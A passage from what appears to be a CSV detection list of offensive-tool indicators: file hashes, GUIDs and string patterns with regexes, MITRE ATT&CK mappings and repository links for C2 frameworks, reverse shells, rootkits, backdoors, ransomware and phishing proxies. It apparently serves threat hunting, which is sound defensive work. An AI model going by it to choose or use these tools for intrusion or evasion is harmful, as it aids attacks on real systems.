framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b83bd9409f469f3b094b81bdbf548e5449357ecd4c604d45f3ccd59c02e28a1e*",".{0,1000}b83bd9409f469f3b094b81bdbf548e5449357ecd4c604d45f3ccd59c02e28a1e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b83de77d08d842c68a940103588639cef6ab9f9fa12241311d9aed3690502af3*",".{0,1000}b83de77d08d842c68a940103588639cef6ab9f9fa12241311d9aed3690502af3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b83ee6d62e5e159fa0a16fcad953862a1d567abc5c60aa35dc02aac7efc87870*",".{0,1000}b83ee6d62e5e159fa0a16fcad953862a1d567abc5c60aa35dc02aac7efc87870.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A" "*b83ee6d62e5e159fa0a16fcad953862a1d567abc5c60aa35dc02aac7efc87870*",".{0,1000}b83ee6d62e5e159fa0a16fcad953862a1d567abc5c60aa35dc02aac7efc87870.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","https://www.virustotal.com/gui/file/b83ee6d62e5e159fa0a16fcad953862a1d567abc5c60aa35dc02aac7efc87870","10","10","N/A","N/A","N/A","N/A" "*b84798b914f570f9b52bf3fe754c2559795aa6c3daa4c4344f4bce69f5f759d9*",".{0,1000}b84798b914f570f9b52bf3fe754c2559795aa6c3daa4c4344f4bce69f5f759d9.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*b872e0bbe252aa4e33492453232f6320b8d35b536db2efbf9d50a1d4e5de14d7*",".{0,1000}b872e0bbe252aa4e33492453232f6320b8d35b536db2efbf9d50a1d4e5de14d7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*B88B65D3-2689-4E39-892C-7532087174CB*",".{0,1000}B88B65D3\-2689\-4E39\-892C\-7532087174CB.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*b8939f328f43eafc2faa8ba8532a756eb9db47e00e947ad8543484b4b0958bb8*",".{0,1000}b8939f328f43eafc2faa8ba8532a756eb9db47e00e947ad8543484b4b0958bb8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b89570294bb08b6ac4245fe0db6e35c1b23fa01ad3a9ac0bfe07043c7af3350c*",".{0,1000}b89570294bb08b6ac4245fe0db6e35c1b23fa01ad3a9ac0bfe07043c7af3350c.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*b898e52e3799d4c3c4fa328c400ba620c814c11ca23d0b7ec2f3fd7917a7e8a1*",".{0,1000}b898e52e3799d4c3c4fa328c400ba620c814c11ca23d0b7ec2f3fd7917a7e8a1.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*b8ae91971edca5937251c1f9a09ca5eb2c48a98ef4a80187394f2c037bbefb46*",".{0,1000}b8ae91971edca5937251c1f9a09ca5eb2c48a98ef4a80187394f2c037bbefb46.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*B8AEE3F1-0642-443C-B42C-33BADCD42365*",".{0,1000}B8AEE3F1\-0642\-443C\-B42C\-33BADCD42365.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*b8c9caeda6743d224835019b8bdc0105ad54f9a804a33e7e51acb605a8e8bc25*",".{0,1000}b8c9caeda6743d224835019b8bdc0105ad54f9a804a33e7e51acb605a8e8bc25.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7*",".{0,1000}b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7*",".{0,1000}b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*b94466ebb0aa74a4b4b35da803416e130db2826ee1d0b4191f88c8d602cf4443*",".{0,1000}b94466ebb0aa74a4b4b35da803416e130db2826ee1d0b4191f88c8d602cf4443.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b9554f35c8c8dc4a5b428322fea2fa3a00cec87a17c5ed276a6dfe804f3828ed*",".{0,1000}b9554f35c8c8dc4a5b428322fea2fa3a00cec87a17c5ed276a6dfe804f3828ed.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*B9635D08-2BB2-404B-92B7-6A4981CB34F3*",".{0,1000}B9635D08\-2BB2\-404B\-92B7\-6A4981CB34F3.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*b97aed185c60d0b6764cdcd4c6133d09c0f028ed4a53e766d75b42418765e0c4*",".{0,1000}b97aed185c60d0b6764cdcd4c6133d09c0f028ed4a53e766d75b42418765e0c4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*b9919cdb3ebf7abed7458e357a71924bb0dd43332e90c30a6f146caefcf56baa*",".{0,1000}b9919cdb3ebf7abed7458e357a71924bb0dd43332e90c30a6f146caefcf56baa.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*b9946bcbb56b9088f6d5ab8660665ea8f80c5f3d08df6e4531362653d07de2c9*",".{0,1000}b9946bcbb56b9088f6d5ab8660665ea8f80c5f3d08df6e4531362653d07de2c9.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*b9e0d24db9c2db196bf5290e2ea67913ba908e69e951c62a89a6e80e90c40a0e*",".{0,1000}b9e0d24db9c2db196bf5290e2ea67913ba908e69e951c62a89a6e80e90c40a0e.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*ba0ec36076382b07332c8d5329ccec4c577ec5d6527c1a6dc56694744763024c*",".{0,1000}ba0ec36076382b07332c8d5329ccec4c577ec5d6527c1a6dc56694744763024c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ba41cc2f4c5dfb7df874b0e92f99f33b37b11574aab288d229749eba00e98813*",".{0,1000}ba41cc2f4c5dfb7df874b0e92f99f33b37b11574aab288d229749eba00e98813.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*ba81b4c4203d94358c4b0b725b4f905ddfb9b4edea7ad6e097d770485e5a8679*",".{0,1000}ba81b4c4203d94358c4b0b725b4f905ddfb9b4edea7ad6e097d770485e5a8679.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ba933871cda9e4c84297af7c34424c01d565e7f3968f14e8bae4ec26e7f7b389*",".{0,1000}ba933871cda9e4c84297af7c34424c01d565e7f3968f14e8bae4ec26e7f7b389.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*ba9660f0473b88e967d6eaeff0671afb20617fe49fe028a4d543e42edd0a8476*",".{0,1000}ba9660f0473b88e967d6eaeff0671afb20617fe49fe028a4d543e42edd0a8476.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*BA9D2748-1342-41A3-87F2-343E82D99813*",".{0,1000}BA9D2748\-1342\-41A3\-87F2\-343E82D99813.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*baa3a3f7c6a17963ab80baff6de74aca91e4e75fa0a4f80bf18af9a5622edec3*",".{0,1000}baa3a3f7c6a17963ab80baff6de74aca91e4e75fa0a4f80bf18af9a5622edec3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*babelstrike.py -*",".{0,1000}babelstrike\.py\s\-.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","1","2","110","22","2023-12-16T13:51:54Z","2023-01-10T07:59:00Z" "*BabelStrike-main*",".{0,1000}BabelStrike\-main.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","2","110","22","2023-12-16T13:51:54Z","2023-01-10T07:59:00Z" "*bac188a072ffe2acbdd2d33035c3747b3febad807f5db13caa7b15bcb5bff415*",".{0,1000}bac188a072ffe2acbdd2d33035c3747b3febad807f5db13caa7b15bcb5bff415.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*Backdoor did not understand the request*",".{0,1000}Backdoor\sdid\snot\sunderstand\sthe\srequest.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Backdoor has been set up successfully*",".{0,1000}Backdoor\shas\sbeen\sset\sup\ssuccessfully.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*Backdoor is already removed :)*",".{0,1000}Backdoor\sis\salready\sremoved\s\:\).{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*Backdoor is already set up ;)*",".{0,1000}Backdoor\sis\salready\sset\sup\s\;\).{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*Backdoor LNK*",".{0,1000}Backdoor\sLNK.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*Backdoor sent unrecognizable message:*",".{0,1000}Backdoor\ssent\sunrecognizable\smessage\:.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Backdoor.*",".{0,1000}Backdoor\..{0,1000}","offensive_tool_keyword","backdoor keyword","keyword observed in multiple backdoor tools","T1037.001 - T1037.002 - T1003.001 - T1001.002 - T1055.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*backdoor.asp*",".{0,1000}backdoor\.asp.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*backdoor.aspx*",".{0,1000}backdoor\.aspx.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*backdoor.jsp*",".{0,1000}backdoor\.jsp.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*backdoor.php*",".{0,1000}backdoor\.php.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*backdoor.sh -v * -p *",".{0,1000}backdoor\.sh\s\-v\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","0","N/A","10","3","294","81","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z" "*BackdoorableScript*",".{0,1000}BackdoorableScript.{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","65","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" "*--backdoor-all*",".{0,1000}\-\-backdoor\-all.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*BackdoorLNK*",".{0,1000}BackdoorLNK.{0,1000}","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*backdoorlnkdialog*",".{0,1000}backdoorlnkdialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 